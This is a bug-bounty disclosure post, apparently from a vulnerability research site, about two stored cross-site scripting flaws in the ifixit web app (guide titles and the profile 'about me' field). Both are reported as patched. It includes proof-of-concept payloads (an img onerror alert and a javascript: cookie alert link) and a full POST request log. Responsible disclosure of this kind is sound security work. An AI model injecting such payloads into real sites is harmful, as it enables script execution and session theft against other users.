ifixit Bug Bounty Program 2016 Q1 - Multiple Vulnerabilities disclosed by Core Researcher

Editorial_Staff_Team's picture

ifixit Bug Bounty Program 2016 Q1 - Multiple Vulnerabilities disclosed by Core Researcher

In the last 3 weeks the vulnerability researcher and core team member "hadji samir" discovered several valid bugs to the official ifixit company. The issue was disclosed in the online service web-application of the ifixit company.

The first vulnerability was located in the `title name` value of the `guides` and `prerequisite guides` search modules. Remote attackers with low privileged web-application user accounts are able to inject own malicious script codes to the application-side of the affected POST/GET method request. The attack vector of the vulnerability is located on the application-side and the request method to inject is POST. The execution of the inserted payload occurs in the search module were the `guides` and `prerequisite guides` becomes available with keyword.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] guides
[+] prerequisite guides

Vulnerable Parameter(s):
[+] title name (Guide)

Affected Module(s):
[+] Search Guide

PoC: Exploitcode
<div class="prereqBody">
<i class="fa fa-minus-circle delete"></i>

<span class="prereqName">Samir"><img src="c" onerror=alert(document.domain)></span>
</div>

--- PoC Session Logs [POST] ---
Status: 201[Created]
POST https://www.ifixit.com/api/2.0/guides
Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Content Size[2192] Mime Type[application/json]
   Request Headers:
      Host[www.ifixit.com]
      User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[text/javascript, text/html, application/xml, text/xml, */*]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate, br]
      X-Requested-With[XMLHttpRequest]
      X-HTTP-Method-Override[POST]
      X-CSRF[5vq44aqiks]
      X-ALLOW-HTTP[true]
      Api-Client[iFixit-Web]
      Content-Type[application/x-www-form-urlencoded; charset=utf-8]
      Referer[https://www.ifixit.com/Guide/new]
      Content-Length[312]
      Cookie[_ga=
      Connection[keep-alive]
   Post Data:

      {"type":"replacement","category":"test","subject":"test","title":"Samir\"><img src=\"c\" onerror=alert(document.domain)> Replacement","summary":"test","introduction":"","flags":[],"image":null,"langid":"en"}]
   Response Headers:
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      x-content-type-options[nosniff]
      X-Max-Age[30m]
      Content-Type[application/json]
      Content-Length[2192]
      Accept-Ranges[bytes]
      Date[Mon, 01 Feb 2016 13:52:16 GMT]
      X-Varnish[166966529]
      Age[0]
      X-Debug-Deliver[True]
      X-Debug-Cache[MISS]

The second vulnerability was located in the additional information input field of the `my profile > about me` web-application module. Remote attackers with low privileged web-application user accounts are able to inject own script codes to the application-side of the vulnerable modules context. The attack vector is located on the application-side and the request method to inject is POST.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] my profile > about me

Vulnerable Input(s):
[+] additional information

Affected Module(s):
[+] my profile

Manual steps to reproduce the vulnerability ...
1. Open my profile > About me >  Additional Information
2. Write in the Additional Information input field your own script code payload
3. Save the entry
4. revisit the my profile page
5. Successful reproduce of the vulnerability!

PoC:
[image|100|caption=<click here >|link=javascript:alert(document.cookie)]

Finally both issues are patched by the manufacturer. The core team researcher received a nice "lock picking gift" next to the regular bug bounty reward by the ifixit company. The third issue is not public yet but we keep you updated!

Advisories:

http://www.vulnerability-lab.com/get_content.php?id=1700

http://www.vulnerability-lab.com/get_content.php?id=1701

http://www.vulnerability-lab.com/get_content.php?id=1675

 

Rate this article: 
Average: 5 (4 votes)

Add new comment

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.